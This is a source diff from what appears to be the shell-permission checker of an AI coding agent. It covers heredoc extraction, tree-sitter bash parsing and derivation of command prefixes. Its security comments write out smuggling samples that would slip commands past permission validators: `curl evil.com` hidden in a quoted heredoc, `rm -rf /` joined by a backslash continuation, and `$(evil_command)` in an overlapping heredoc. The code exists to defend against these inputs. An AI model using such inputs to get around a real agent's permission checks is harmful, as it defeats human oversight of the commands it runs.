+    // (e.g., <<'EOF'a where bash uses "EOFa" but we captured "EOF").
+    // IMPORTANT: Only match bash's actual metacharacters — space (0x20),
+    // tab (0x09), newline (0x0A), |, &, ;, (, ), <, >. Do NOT use \s which
+    // also matches \r, \f, \v, and Unicode whitespace that bash treats as
+    // regular word characters, not terminators.
+    if (operatorEndIndex < command.length) {
+      const nextChar = command[operatorEndIndex]!
+      if (!/^[ \t\n|&;()<>]$/.test(nextChar)) {
+        continue
+      }
+    }
+
+    // In bash, heredoc content starts on the NEXT LINE after the operator.
+    // Any content on the same line after <<EOF (like " && echo done") is part
+    // of the command, not the heredoc content.
+    //
+    // SECURITY: The "same line" must be the LOGICAL command line, not the
+    // first physical newline. Multi-line quoted strings extend the logical
+    // line — bash waits for the quote to close before starting to read the
+    // heredoc body. A quote-blind `indexOf('\n')` finds newlines INSIDE
+    // quoted strings, causing the body to start too early.
+    //
+    // Exploit: `echo <<'EOF' '${}\n' ; curl evil.com\nEOF`
+    //   - The `\n` inside `'${}\n'` is quoted (literal newline in a string arg)
+    //   - Bash: waits for `'` to close → logical line is
+    //     `echo <<'EOF' '${}\n' ; curl evil.com` → heredoc body = `EOF`
+    //   - Our old code: indexOf('\n') finds the quoted newline → body starts
+    //     at `' ; curl evil.com\nEOF` → curl swallowed into placeholder →
+    //     NEVER reaches permission checks.
+    //
+    // Fix: scan forward from operatorEndIndex using quote-state tracking,
+    // finding the first newline that's NOT inside a quoted string. Same
+    // quote-tracking semantics as advanceScan (already used to validate
+    // the `<<` operator position above).
+    let firstNewlineOffset = -1
+    {
+      let inSingleQuote = false
+      let inDoubleQuote = false
+      // We start with clean quote state — advanceScan already rejected the
+      // case where the `<<` operator itself is inside a quote.
+      for (let k = operatorEndIndex; k < command.length; k++) {
+        const ch = command[k]
+        if (inSingleQuote) {
+          if (ch === "'") inSingleQuote = false
+          continue
+        }
+        if (inDoubleQuote) {
+          if (ch === '\\') {
+            k++ // skip escaped char inside double quotes
+            continue
+          }
+          if (ch === '"') inDoubleQuote = false
+          continue
+        }
+        // Unquoted context
+        if (ch === '\n') {
+          firstNewlineOffset = k - operatorEndIndex
+          break
+        }
+        // Count backslashes for escape detection in unquoted context
+        let backslashCount = 0
+        for (let j = k - 1; j >= operatorEndIndex && command[j] === '\\'; j--) {
+          backslashCount++
+        }
+        if (backslashCount % 2 === 1) continue // escaped char
+        if (ch === "'") inSingleQuote = true
+        else if (ch === '"') inDoubleQuote = true
+      }
+      // If we ended while still inside a quote, the logical line never ends —
+      // there is no heredoc body. Leave firstNewlineOffset as -1 (handled below).
+    }
+
+    // If no unquoted newline found, this heredoc has no content - skip it
+    if (firstNewlineOffset === -1) {
+      continue
+    }
+
+    // Security: Check for backslash-newline continuation at the end of the
+    // same-line content (text between the operator and the newline). In bash,
+    // `\<newline>` joins lines BEFORE heredoc parsing — so:
+    //   cat <<'EOF' && \
+    //   rm -rf /
+    //   content
+    //   EOF
+    // bash joins to `cat <<'EOF' && rm -rf /` (rm is part of the command line),
+    // then heredoc body = `content`. Our extractor runs BEFORE continuation
+    // joining (commands.ts:82), so it would put `rm -rf /` in the heredoc body,
+    // hiding it from all validators. Bail if same-line content ends with an
+    // odd number of backslashes.
+    const sameLineContent = command.slice(
+      operatorEndIndex,
+      operatorEndIndex + firstNewlineOffset,
+    )
+    let trailingBackslashes = 0
+    for (let j = sameLineContent.length - 1; j >= 0; j--) {
+      if (sameLineContent[j] === '\\') {
+        trailingBackslashes++
+      } else {
+        break
+      }
+    }
+    if (trailingBackslashes % 2 === 1) {
+      // Odd number of trailing backslashes → last one escapes the newline
+      // → this is a line continuation. Our heredoc-before-continuation order
+      // would misparse this. Bail out.
+      continue
+    }
+
+    const contentStartIndex = operatorEndIndex + firstNewlineOffset
+    const afterNewline = command.slice(contentStartIndex + 1) // +1 to skip the newline itself
+    const contentLines = afterNewline.split('\n')
+
+    // Find the closing delimiter - must be on its own line
+    // Security: Must match bash's exact behavior to prevent parsing discrepancies
+    // that could allow command smuggling past permission checks.
+    let closingLineIndex = -1
+    for (let i = 0; i < contentLines.length; i++) {
+      const line = contentLines[i]!
+
+      if (isDash) {
+        // <<- strips leading TABS only (not spaces), per POSIX/bash spec.
+        // The line after stripping leading tabs must be exactly the delimiter.
+        const stripped = line.replace(/^\t*/, '')
+        if (stripped === delimiter) {
+          closingLineIndex = i
+          break
+        }
+      } else {
+        // << requires the closing delimiter to be exactly alone on the line
+        // with NO leading or trailing whitespace. This matches bash behavior.
+        if (line === delimiter) {
+          closingLineIndex = i
+          break
+        }
+      }
+
+      // Security: Check for PST_EOFTOKEN-like early closure (make_cmd.c:606).
+      // Inside $(), ${}, or backtick substitution, bash closes a heredoc when
+      // a line STARTS with the delimiter and contains the shell_eof_token
+      // (`)`, `}`, or backtick) anywhere after it. Our parser only does exact
+      // line matching, so this discrepancy could hide smuggled commands.
+      //
+      // Paranoid extension: also bail on bash metacharacters (|, &, ;, (, <,
+      // >) after the delimiter, which could indicate command syntax from a
+      // parsing discrepancy we haven't identified.
+      //
+      // For <<- heredocs, bash strips leading tabs before this check.
+      const eofCheckLine = isDash ? line.replace(/^\t*/, '') : line
+      if (
+        eofCheckLine.length > delimiter.length &&
+        eofCheckLine.startsWith(delimiter)
+      ) {
+        const charAfterDelimiter = eofCheckLine[delimiter.length]!
+        if (/^[)}`|&;(<>]$/.test(charAfterDelimiter)) {
+          // Shell metacharacter or substitution closer after delimiter —
+          // bash may close the heredoc early here. Bail out.
+          closingLineIndex = -1
+          break
+        }
+      }
+    }
+
+    // Security: If quotedOnly mode is set and this is an unquoted heredoc,
+    // record its content range for nesting checks but do NOT add it to
+    // heredocMatches. This ensures quoted "heredocs" inside its body are
+    // correctly rejected by the insideSkipped check on subsequent iterations.
+    //
+    // CRITICAL: We do this BEFORE the closingLineIndex === -1 check. If the
+    // unquoted heredoc has no closing delimiter, bash still treats everything
+    // to end-of-input as the heredoc body (and expands $() within it). We
+    // must block extraction of any subsequent quoted "heredoc" that falls
+    // inside that unbounded body.
+    if (options?.quotedOnly && !isQuotedOrEscaped) {
+      let skipContentEndIndex: number
+      if (closingLineIndex === -1) {
+        // No closing delimiter — in bash, heredoc body extends to end of
+        // input. Track the entire remaining range as "skipped body".
+        skipContentEndIndex = command.length
+      } else {
+        const skipLinesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
+        const skipContentLength = skipLinesUpToClosing.join('\n').length
+        skipContentEndIndex = contentStartIndex + 1 + skipContentLength
+      }
+      skippedHeredocRanges.push({
+        contentStartIndex,
+        contentEndIndex: skipContentEndIndex,
+      })
+      continue
+    }
+
+    // If no closing delimiter found, this is malformed - skip it
+    if (closingLineIndex === -1) {
+      continue
+    }
+
+    // Calculate end position: contentStartIndex + 1 (newline) + length of lines up to and including closing delimiter
+    const linesUpToClosing = contentLines.slice(0, closingLineIndex + 1)
+    const contentLength = linesUpToClosing.join('\n').length
+    const contentEndIndex = contentStartIndex + 1 + contentLength
+
+    // Security: Bail if this heredoc's content range OVERLAPS with any
+    // previously-skipped heredoc's content range. This catches the case where
+    // two heredocs share a command line (`cat <<EOF <<'SAFE'`) and the first
+    // is unquoted (skipped in quotedOnly mode). In bash, when multiple heredocs
+    // share a line, their bodies appear SEQUENTIALLY (first's body, then
+    // second's). Both compute contentStartIndex from the SAME newline, so the
+    // second's body search walks through the first's body. For:
+    //   cat <<EOF <<'SAFE'
+    //   $(evil_command)
+    //   EOF
+    //   safe body
+    //   SAFE
+    // ...the quoted <<'SAFE' would incorrectly extract lines 2-4 as its body,
+    // swallowing `$(evil_command)` (which bash EXECUTES via the unquoted
+    // <<EOF's expansion) into the placeholder, hiding it from validators.
+    //
+    // The insideSkipped check above doesn't catch this because the quoted
+    // operator's startIndex is on the command line BEFORE contentStart.
+    // The contentStartPositions dedup check below doesn't catch it because the
+    // skipped heredoc is in skippedHeredocRanges, not topLevelHeredocs.
+    let overlapsSkipped = false
+    for (const skipped of skippedHeredocRanges) {
+      // Ranges [a,b) and [c,d) overlap iff a < d && c < b
+      if (
+        contentStartIndex < skipped.contentEndIndex &&
+        skipped.contentStartIndex < contentEndIndex
+      ) {
+        overlapsSkipped = true
+        break
+      }
+    }
+    if (overlapsSkipped) {
+      continue
+    }
+
+    // Build fullText: operator + newline + content (normalized form for restoration)
+    // This creates a clean heredoc that can be restored correctly
+    const operatorText = command.slice(startIndex, operatorEndIndex)
+    const contentText = command.slice(contentStartIndex, contentEndIndex)
+    const fullText = operatorText + contentText
+
+    heredocMatches.push({
+      fullText,
+      delimiter,
+      operatorStartIndex: startIndex,
+      operatorEndIndex,
+      contentStartIndex,
+      contentEndIndex,
+    })
+  }
+
+  // If no valid heredocs found, return original
+  if (heredocMatches.length === 0) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Filter out nested heredocs - any heredoc whose operator starts inside
+  // another heredoc's content range should be excluded.
+  // This prevents corruption when heredoc content contains << patterns.
+  const topLevelHeredocs = heredocMatches.filter((candidate, _i, all) => {
+    // Check if this candidate's operator is inside any other heredoc's content
+    for (const other of all) {
+      if (candidate === other) continue
+      // Check if candidate's operator starts within other's content range
+      if (
+        candidate.operatorStartIndex > other.contentStartIndex &&
+        candidate.operatorStartIndex < other.contentEndIndex
+      ) {
+        // This heredoc is nested inside another - filter it out
+        return false
+      }
+    }
+    return true
+  })
+
+  // If filtering removed all heredocs, return original
+  if (topLevelHeredocs.length === 0) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Check for multiple heredocs sharing the same content start position
+  // (i.e., on the same line). This causes index corruption during replacement
+  // because indices are calculated on the original string but applied to
+  // a progressively modified string. Return without extraction - the fallback
+  // is safe (requires manual approval or fails parsing).
+  const contentStartPositions = new Set(
+    topLevelHeredocs.map(h => h.contentStartIndex),
+  )
+  if (contentStartPositions.size < topLevelHeredocs.length) {
+    return { processedCommand: command, heredocs }
+  }
+
+  // Sort by content end position descending so we can replace from end to start
+  // (this preserves indices for earlier replacements)
+  topLevelHeredocs.sort((a, b) => b.contentEndIndex - a.contentEndIndex)
+
+  // Generate a unique salt for this extraction to prevent placeholder collisions
+  // with literal "__HEREDOC_N__" text in commands
+  const salt = generatePlaceholderSalt()
+
+  let processedCommand = command
+  topLevelHeredocs.forEach((info, index) => {
+    // Use reverse index since we sorted descending
+    const placeholderIndex = topLevelHeredocs.length - 1 - index
+    const placeholder = `${HEREDOC_PLACEHOLDER_PREFIX}${placeholderIndex}_${salt}${HEREDOC_PLACEHOLDER_SUFFIX}`
+
+    heredocs.set(placeholder, info)
+
+    // Replace heredoc with placeholder while preserving same-line content:
+    // - Keep everything before the operator
+    // - Replace operator with placeholder
+    // - Keep content between operator and heredoc content (e.g., " && echo done")
+    // - Remove the heredoc content (from newline through closing delimiter)
+    // - Keep everything after the closing delimiter
+    processedCommand =
+      processedCommand.slice(0, info.operatorStartIndex) +
+      placeholder +
+      processedCommand.slice(info.operatorEndIndex, info.contentStartIndex) +
+      processedCommand.slice(info.contentEndIndex)
+  })
+
+  return { processedCommand, heredocs }
+}
+
+/**
+ * Restores heredoc placeholders back to their original content in a single string.
+ * Internal helper used by restoreHeredocs.
+ *
+ * Every occurrence of each placeholder key found in `text` is replaced with
+ * the `fullText` of the matching map entry, inserted verbatim.
+ *
+ * @param text - String that may contain heredoc placeholders
+ * @param heredocs - Map from placeholder to the heredoc it stands for
+ * @returns `text` with every placeholder expanded to its heredoc's `fullText`
+ */
+function restoreHeredocsInString(
+  text: string,
+  heredocs: Map<string, HeredocInfo>,
+): string {
+  let result = text
+  for (const [placeholder, info] of heredocs) {
+    // Use a replacer function rather than a replacement string: with a
+    // string, `$$`, `$&`, `` $` `` and `$'` inside the heredoc text are
+    // interpreted as substitution patterns, so shell content such as
+    // `echo $$` would come back as `echo $`.
+    result = result.replaceAll(placeholder, () => info.fullText)
+  }
+  return result
+}
+
+/**
+ * Expands heredoc placeholders in every element of a string array.
+ *
+ * @param parts - Strings that may contain heredoc placeholders
+ * @param heredocs - Placeholder map produced by `extractHeredocs`
+ * @returns `parts` itself when the map is empty; otherwise a new array in
+ *   which each element has had its placeholders expanded
+ */
+export function restoreHeredocs(
+  parts: string[],
+  heredocs: Map<string, HeredocInfo>,
+): string[] {
+  // Nothing to expand: hand the caller's array back untouched.
+  const nothingToRestore = heredocs.size === 0
+  return nothingToRestore
+    ? parts
+    : parts.map(segment => restoreHeredocsInString(segment, heredocs))
+}
+
+/**
+ * Checks if a command contains heredoc syntax.
+ *
+ * This is a quick check that doesn't validate the heredoc is well-formed,
+ * just that the pattern exists.
+ *
+ * @param command - The shell command string
+ * @returns true if the command appears to contain heredoc syntax, i.e.
+ *   `HEREDOC_START_PATTERN` matches somewhere in it
+ */
+export function containsHeredoc(command: string): boolean {
+  // NOTE(review): RegExp.prototype.test is stateful (via lastIndex) when the
+  // pattern carries the `g` or `y` flag — confirm HEREDOC_START_PATTERN has
+  // neither, otherwise repeated calls can give alternating results.
+  return HEREDOC_START_PATTERN.test(command)
+}
@@ -0,0 +1,230 @@
+import { feature } from 'bun:bundle'
+import { logEvent } from '../../services/analytics/index.js'
+import { logForDebugging } from '../debug.js'
+import {
+  ensureParserInitialized,
+  getParserModule,
+  type TsNode,
+} from './bashParser.js'
+
+export type Node = TsNode
+
+/**
+ * Result of `parseCommand`: the parsed tree plus the pieces extracted from it.
+ */
+export interface ParsedCommandData {
+  // Root of the tree returned by the parser module for the command.
+  rootNode: Node
+  // Text of the variable_assignment children that precede the command name
+  // of `commandNode`; empty when there are none or when `commandNode` is
+  // not a plain `command` node.
+  envVars: string[]
+  // Command (or declaration_command) node located in the tree, or null when
+  // none was found.
+  commandNode: Node | null
+  // The command string exactly as it was passed to `parseCommand`.
+  originalCommand: string
+}
+
+// Commands longer than this many characters are never handed to the parser;
+// parseCommand / parseCommandRaw return null for them.
+const MAX_COMMAND_LENGTH = 10000
+// Keywords accepted as the first child of a declaration_command node; when
+// matched, extractCommandArguments returns just that keyword.
+const DECLARATION_COMMANDS = new Set([
+  'export',
+  'declare',
+  'typeset',
+  'readonly',
+  'local',
+  'unset',
+  'unsetenv',
+])
+// Node types that extractCommandArguments collects as arguments.
+const ARGUMENT_TYPES = new Set(['word', 'string', 'raw_string', 'number'])
+// Node types at which extractCommandArguments stops collecting arguments.
+const SUBSTITUTION_TYPES = new Set([
+  'command_substitution',
+  'process_substitution',
+])
+// Node types that findCommandNode treats as "a command".
+const COMMAND_TYPES = new Set(['command', 'declaration_command'])
+
+// Flips to true once the load outcome has been reported; later calls to
+// logLoadOnce are no-ops.
+let logged = false
+
+/**
+ * Reports the parser-module load outcome: one debug line plus one
+ * `tengu_tree_sitter_load` analytics event. Only the first call has any
+ * effect.
+ *
+ * @param success - Whether the parser module was available
+ */
+function logLoadOnce(success: boolean): void {
+  if (!logged) {
+    logged = true
+    const message = success
+      ? 'tree-sitter: native module loaded'
+      : 'tree-sitter: unavailable'
+    logForDebugging(message)
+    logEvent('tengu_tree_sitter_load', { success })
+  }
+}
+
+/**
+ * Awaits WASM init (Parser.init + Language.load). Must be called before
+ * parseCommand/parseCommandRaw for the parser to be available. Idempotent.
+ *
+ * Resolves without initializing anything when neither the TREE_SITTER_BASH
+ * nor the TREE_SITTER_BASH_SHADOW feature is enabled.
+ */
+export async function ensureInitialized(): Promise<void> {
+  if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
+    await ensureParserInitialized()
+  }
+}
+
+/**
+ * Parses a shell command and extracts its command node and the
+ * variable assignments that precede the command name.
+ *
+ * @param command - The shell command string to parse
+ * @returns The parsed data, or null when the command is empty or longer
+ *   than MAX_COMMAND_LENGTH, the TREE_SITTER_BASH feature is off, the parser
+ *   module is unavailable, or parsing returns nothing / throws
+ */
+export async function parseCommand(
+  command: string,
+): Promise<ParsedCommandData | null> {
+  if (!command || command.length > MAX_COMMAND_LENGTH) return null
+
+  // Gate: ant-only until pentest. External builds fall back to legacy
+  // regex/shell-quote path. Guarding the whole body inside the positive
+  // branch lets Bun DCE the NAPI import AND keeps telemetry honest — we
+  // only fire tengu_tree_sitter_load when a load was genuinely attempted.
+  if (feature('TREE_SITTER_BASH')) {
+    await ensureParserInitialized()
+    const mod = getParserModule()
+    logLoadOnce(mod !== null)
+    if (!mod) return null
+
+    try {
+      const rootNode = mod.parse(command)
+      if (!rootNode) return null
+
+      const commandNode = findCommandNode(rootNode, null)
+      const envVars = extractEnvVars(commandNode)
+
+      return { rootNode, envVars, commandNode, originalCommand: command }
+    } catch {
+      // Any exception from parsing or the tree walk is reported as "no parse".
+      return null
+    }
+  }
+  return null
+}
+
+/**
+ * SECURITY: Sentinel for "parser was loaded and attempted, but aborted"
+ * (timeout / node budget / Rust panic). Distinct from `null` (module not
+ * loaded). Adversarial input can trigger abort under MAX_COMMAND_LENGTH:
+ * `(( a[0][0]... ))` with ~2800 subscripts hits PARSE_TIMEOUT_MICROS.
+ * Callers MUST treat this as fail-closed (too-complex), NOT route to legacy.
+ *
+ * Returned by parseCommandRaw.
+ *
+ * NOTE(review): the comment inside parseCommandRaw names the timeout
+ * PARSE_TIMEOUT_MS while this one says PARSE_TIMEOUT_MICROS — confirm the
+ * constant name and unit against bashParser.ts.
+ */
+export const PARSE_ABORTED = Symbol('parse-aborted')
+
+/**
+ * Raw parse — skips findCommandNode/extractEnvVars which the security
+ * walker in ast.ts doesn't use. Saves one tree walk per bash command.
+ *
+ * Runs when either the TREE_SITTER_BASH or the TREE_SITTER_BASH_SHADOW
+ * feature is enabled. Each abort is reported through a
+ * `tengu_tree_sitter_parse_abort` analytics event carrying the command
+ * length and whether the abort was an exception (`panic`).
+ *
+ * @param command - The shell command string to parse
+ *
+ * Returns:
+ *   - Node: parse succeeded
+ *   - null: module not loaded / feature off / empty / over-length
+ *   - PARSE_ABORTED: module loaded but parse failed (timeout/panic)
+ */
+export async function parseCommandRaw(
+  command: string,
+): Promise<Node | null | typeof PARSE_ABORTED> {
+  if (!command || command.length > MAX_COMMAND_LENGTH) return null
+  if (feature('TREE_SITTER_BASH') || feature('TREE_SITTER_BASH_SHADOW')) {
+    await ensureParserInitialized()
+    const mod = getParserModule()
+    logLoadOnce(mod !== null)
+    if (!mod) return null
+    try {
+      const result = mod.parse(command)
+      // SECURITY: Module loaded; null here = timeout/node-budget abort in
+      // bashParser.ts (PARSE_TIMEOUT_MS=50, MAX_NODES=50_000).
+      // Previously collapsed into `return null` → parse-unavailable → legacy
+      // path, which lacks EVAL_LIKE_BUILTINS — `trap`, `enable`, `hash` leaked.
+      if (result === null) {
+        logEvent('tengu_tree_sitter_parse_abort', {
+          cmdLength: command.length,
+          panic: false,
+        })
+        return PARSE_ABORTED
+      }
+      return result
+    } catch {
+      // An exception thrown by the parser is reported as an abort too, with
+      // `panic: true` to tell it apart from the null-result case above.
+      logEvent('tengu_tree_sitter_parse_abort', {
+        cmdLength: command.length,
+        panic: true,
+      })
+      return PARSE_ABORTED
+    }
+  }
+  return null
+}
+
+/**
+ * Locates a command (or declaration_command) node in the tree rooted at
+ * `node`.
+ *
+ * - A node that is itself a command is returned as is.
+ * - For a variable_assignment with a known parent, the result is the
+ *   parent's command child that starts after the assignment (or null).
+ * - For a redirected_statement, only its direct children are inspected.
+ * - Every other node (pipelines included) is searched depth-first, child by
+ *   child, and the first hit wins.
+ *
+ * @param node - Node to inspect
+ * @param parent - Parent of `node`, or null at the root
+ * @returns The command node found, or null when there is none
+ */
+function findCommandNode(node: Node, parent: Node | null): Node | null {
+  if (COMMAND_TYPES.has(node.type)) return node
+
+  switch (node.type) {
+    case 'variable_assignment':
+      if (parent) {
+        const followingCommand = parent.children.find(
+          sibling =>
+            COMMAND_TYPES.has(sibling.type) &&
+            sibling.startIndex > node.startIndex,
+        )
+        return followingCommand ?? null
+      }
+      // No parent to look through: fall back to the generic search below.
+      break
+    case 'redirected_statement':
+      return node.children.find(inner => COMMAND_TYPES.has(inner.type)) ?? null
+    default:
+      break
+  }
+
+  // Generic depth-first search; this also covers pipelines.
+  for (const child of node.children) {
+    const found = findCommandNode(child, node)
+    if (found) return found
+  }
+  return null
+}
+
+/**
+ * Collects the text of the variable assignments that come before the
+ * command name of a `command` node (e.g. `FOO=bar` in `FOO=bar ls`).
+ *
+ * @param commandNode - Node to inspect; may be null
+ * @returns The assignment texts in order; empty when `commandNode` is null
+ *   or is not of type `command`
+ */
+function extractEnvVars(commandNode: Node | null): string[] {
+  const isPlainCommand = !!commandNode && commandNode.type === 'command'
+  if (!commandNode || !isPlainCommand) return []
+
+  const assignments: string[] = []
+  for (const child of commandNode.children) {
+    const kind = child.type
+    // The command name ends the run of leading assignments.
+    if (kind === 'command_name' || kind === 'word') break
+    if (kind === 'variable_assignment') assignments.push(child.text)
+  }
+  return assignments
+}
+
+/**
+ * Flattens a command node into `[name, ...args]`.
+ *
+ * - For a declaration_command, the result is just its leading keyword when
+ *   that keyword is one of DECLARATION_COMMANDS, otherwise an empty array.
+ * - For any other node, variable assignments are skipped, the command name
+ *   is kept verbatim, and each following argument has one pair of
+ *   surrounding quotes removed. Collection stops at the first command or
+ *   process substitution.
+ *
+ * @param commandNode - The command node to flatten
+ * @returns The command name followed by its arguments
+ */
+export function extractCommandArguments(commandNode: Node): string[] {
+  if (commandNode.type === 'declaration_command') {
+    const keyword = commandNode.children[0]
+    if (keyword && DECLARATION_COMMANDS.has(keyword.text)) {
+      return [keyword.text]
+    }
+    return []
+  }
+
+  const collected: string[] = []
+  let sawCommandName = false
+
+  for (const child of commandNode.children) {
+    const kind = child.type
+    if (kind === 'variable_assignment') continue
+
+    // A `word` only counts as the command name until a name has been seen.
+    const isName =
+      kind === 'command_name' || (kind === 'word' && !sawCommandName)
+    if (isName) {
+      sawCommandName = true
+      collected.push(child.text)
+      continue
+    }
+
+    if (SUBSTITUTION_TYPES.has(kind)) break
+    if (ARGUMENT_TYPES.has(kind)) collected.push(stripQuotes(child.text))
+  }
+  return collected
+}
+
+/**
+ * Removes one pair of matching surrounding quotes (`"…"` or `'…'`) from
+ * `text`. Anything else — including strings shorter than two characters or
+ * with mismatched quotes — is returned unchanged.
+ */
+function stripQuotes(text: string): string {
+  if (text.length < 2) return text
+
+  const opener = text[0]
+  const closer = text[text.length - 1]
+  const opensWithQuote = opener === '"' || opener === "'"
+  return opensWithQuote && opener === closer ? text.slice(1, -1) : text
+}
@@ -0,0 +1,204 @@
+import { buildPrefix } from '../shell/specPrefix.js'
+import { splitCommand_DEPRECATED } from './commands.js'
+import { extractCommandArguments, parseCommand } from './parser.js'
+import { getCommandSpec } from './registry.js'
+
+// Matches an argument made only of digits; handleWrapper skips such
+// arguments when looking for the wrapped command.
+const NUMERIC = /^\d+$/
+// Matches a leading `NAME=` environment-variable assignment.
+const ENV_VAR = /^[A-Za-z_][A-Za-z0-9_]*=/
+
+// Wrapper commands with complex option handling that can't be expressed in specs
+const WRAPPER_COMMANDS = new Set([
+  'nice', // command position varies based on options
+])
+
+// Normalizes a "single value or array" field to an array.
+const toArray = <T>(val: T | T[]): T[] => (Array.isArray(val) ? val : [val])
+
+// Tells whether `arg` names one of the spec's subcommands. A subcommand may
+// be declared under a single name or a list of names. Used to disambiguate
+// wrapper commands that also have subcommands (e.g. the git spec has
+// isCommand args for aliases). A missing spec or an empty subcommand list
+// never matches.
+function isKnownSubcommand(
+  arg: string,
+  spec: { subcommands?: { name: string | string[] }[] } | null,
+): boolean {
+  const declared = spec?.subcommands
+  if (!declared?.length) return false
+
+  for (const { name } of declared) {
+    const matches = Array.isArray(name) ? name.includes(arg) : name === arg
+    if (matches) return true
+  }
+  return false
+}
+
+/**
+ * Derives a command prefix for a single shell command from its parsed tree
+ * and its command spec.
+ *
+ * @param command - The shell command string
+ * @param recursionDepth - Nesting depth of this call; handleWrapper passes
+ *   `recursionDepth + 1` when it recurses into a wrapped command
+ * @param wrapperCount - Number of wrapper levels already unwrapped
+ * @returns
+ *   - null when `wrapperCount > 2` or `recursionDepth > 10`, when the command
+ *     cannot be parsed, or when a top-level wrapper yields no prefix
+ *   - `{ commandPrefix: null }` when no command node, command name or prefix
+ *     could be determined
+ *   - otherwise the prefix, preceded by any leading env-var assignments
+ */
+export async function getCommandPrefixStatic(
+  command: string,
+  recursionDepth = 0,
+  wrapperCount = 0,
+): Promise<{ commandPrefix: string | null } | null> {
+  if (wrapperCount > 2 || recursionDepth > 10) return null
+
+  const parsed = await parseCommand(command)
+  if (!parsed) return null
+  if (!parsed.commandNode) {
+    return { commandPrefix: null }
+  }
+
+  const { envVars, commandNode } = parsed
+  const cmdArgs = extractCommandArguments(commandNode)
+
+  const [cmd, ...args] = cmdArgs
+  if (!cmd) return { commandPrefix: null }
+
+  // Check if this is a wrapper command by looking at its spec
+  const spec = await getCommandSpec(cmd)
+  // Check if this is a wrapper command
+  let isWrapper =
+    WRAPPER_COMMANDS.has(cmd) ||
+    (spec?.args && toArray(spec.args).some(arg => arg?.isCommand))
+
+  // Special case: if the command has subcommands and the first arg matches a subcommand,
+  // treat it as a regular command, not a wrapper
+  if (isWrapper && args[0] && isKnownSubcommand(args[0], spec)) {
+    isWrapper = false
+  }
+
+  const prefix = isWrapper
+    ? await handleWrapper(cmd, args, recursionDepth, wrapperCount)
+    : await buildPrefix(cmd, args, spec)
+
+  // Only the outermost call turns "wrapper produced no prefix" into a plain
+  // null; nested calls report it as `{ commandPrefix: null }` below.
+  if (prefix === null && recursionDepth === 0 && isWrapper) {
+    return null
+  }
+
+  // Leading assignments are re-attached in front of the prefix.
+  const envPrefix = envVars.length ? `${envVars.join(' ')} ` : ''
+  return { commandPrefix: prefix ? envPrefix + prefix : null }
+}
+
+/**
+ * Builds the prefix for a wrapper command (one that runs another command)
+ * by resolving the prefix of the wrapped command and prepending the
+ * wrapper to it.
+ *
+ * Two strategies are tried in order:
+ * 1. Spec-driven: if the spec marks one argument as `isCommand`, the
+ *    arguments from that position on are resolved recursively.
+ * 2. Fallback: the first argument that is not an option, not purely
+ *    numeric and not a `NAME=` assignment is taken as the start of the
+ *    wrapped command.
+ *
+ * @param command - The wrapper command name
+ * @param args - Arguments that followed the wrapper
+ * @param recursionDepth - Current nesting depth, forwarded as depth + 1
+ * @param wrapperCount - Wrapper levels unwrapped so far, forwarded as count + 1
+ * @returns The combined prefix; `command` alone when no wrapped command is
+ *   found; null when the wrapped command yields no prefix
+ */
+async function handleWrapper(
+  command: string,
+  args: string[],
+  recursionDepth: number,
+  wrapperCount: number,
+): Promise<string | null> {
+  const spec = await getCommandSpec(command)
+
+  if (spec?.args) {
+    const commandArgIndex = toArray(spec.args).findIndex(arg => arg?.isCommand)
+
+    if (commandArgIndex !== -1) {
+      const parts = [command]
+
+      for (let i = 0; i < args.length && i <= commandArgIndex; i++) {
+        if (i === commandArgIndex) {
+          const result = await getCommandPrefixStatic(
+            args.slice(i).join(' '),
+            recursionDepth + 1,
+            wrapperCount + 1,
+          )
+          if (result?.commandPrefix) {
+            parts.push(...result.commandPrefix.split(' '))
+            return parts.join(' ')
+          }
+          // No prefix for the wrapped command: `parts` is discarded and the
+          // fallback below takes over.
+          break
+        } else if (
+          args[i] &&
+          !args[i]!.startsWith('-') &&
+          !ENV_VAR.test(args[i]!)
+        ) {
+          // Positional argument ahead of the command slot: keep it.
+          parts.push(args[i]!)
+        }
+      }
+    }
+  }
+
+  // Fallback: first argument that looks like a command name.
+  const wrapped = args.find(
+    arg => !arg.startsWith('-') && !NUMERIC.test(arg) && !ENV_VAR.test(arg),
+  )
+  if (!wrapped) return command
+
+  const result = await getCommandPrefixStatic(
+    args.slice(args.indexOf(wrapped)).join(' '),
+    recursionDepth + 1,
+    wrapperCount + 1,
+  )
+
+  return !result?.commandPrefix ? null : `${command} ${result.commandPrefix}`
+}
+
+/**
+ * Computes prefix suggestions for a command that may be compound
+ * (joined with && / || / ;).
+ *
+ * A command that splits into at most one subcommand yields its own prefix
+ * (or nothing). Otherwise each subcommand's prefix is computed, prefixes
+ * sharing the same first word are grouped, and every group is reduced to
+ * its word-aligned longest common prefix.
+ *
+ * @param command - The (possibly compound) shell command
+ * @param excludeSubcommand — optional filter; return true for subcommands
+ *   that should be left out of the suggestion (e.g. read-only commands that
+ *   are already auto-allowed)
+ * @returns One prefix per distinct root command, in order of first appearance
+ */
+export async function getCompoundCommandPrefixesStatic(
+  command: string,
+  excludeSubcommand?: (subcommand: string) => boolean,
+): Promise<string[]> {
+  const subcommands = splitCommand_DEPRECATED(command)
+
+  // Single command: nothing to group.
+  if (subcommands.length <= 1) {
+    const single = await getCommandPrefixStatic(command)
+    const only = single?.commandPrefix
+    return only ? [only] : []
+  }
+
+  // Resolve subcommands one after another, bucketing each prefix under its
+  // root (first word) as it arrives.
+  const byRoot = new Map<string, string[]>()
+  for (const raw of subcommands) {
+    const subcommand = raw.trim()
+    if (excludeSubcommand?.(subcommand)) continue
+
+    const resolved = (await getCommandPrefixStatic(subcommand))?.commandPrefix
+    if (!resolved) continue
+
+    const root = resolved.split(' ')[0]!
+    const bucket = byRoot.get(root)
+    if (bucket) {
+      bucket.push(resolved)
+    } else {
+      byRoot.set(root, [resolved])
+    }
+  }
+
+  // Collapse every bucket to its word-aligned common prefix.
+  return Array.from(byRoot.values(), bucket => longestCommonPrefix(bucket))
+}
+
+/**
+ * Longest prefix shared by all strings, measured in whole space-separated
+ * words. At least the first word of the first string is always kept.
+ * e.g. ["git fetch", "git worktree"] → "git"
+ *      ["npm run test", "npm run lint"] → "npm run"
+ *
+ * @returns '' for an empty list, the string itself for a single entry
+ */
+function longestCommonPrefix(strings: string[]): string {
+  const [head, ...rest] = strings
+  if (head === undefined) return ''
+  if (rest.length === 0) return head
+
+  const headWords = head.split(' ')
+  // Shrink the shared word count against each remaining string in turn.
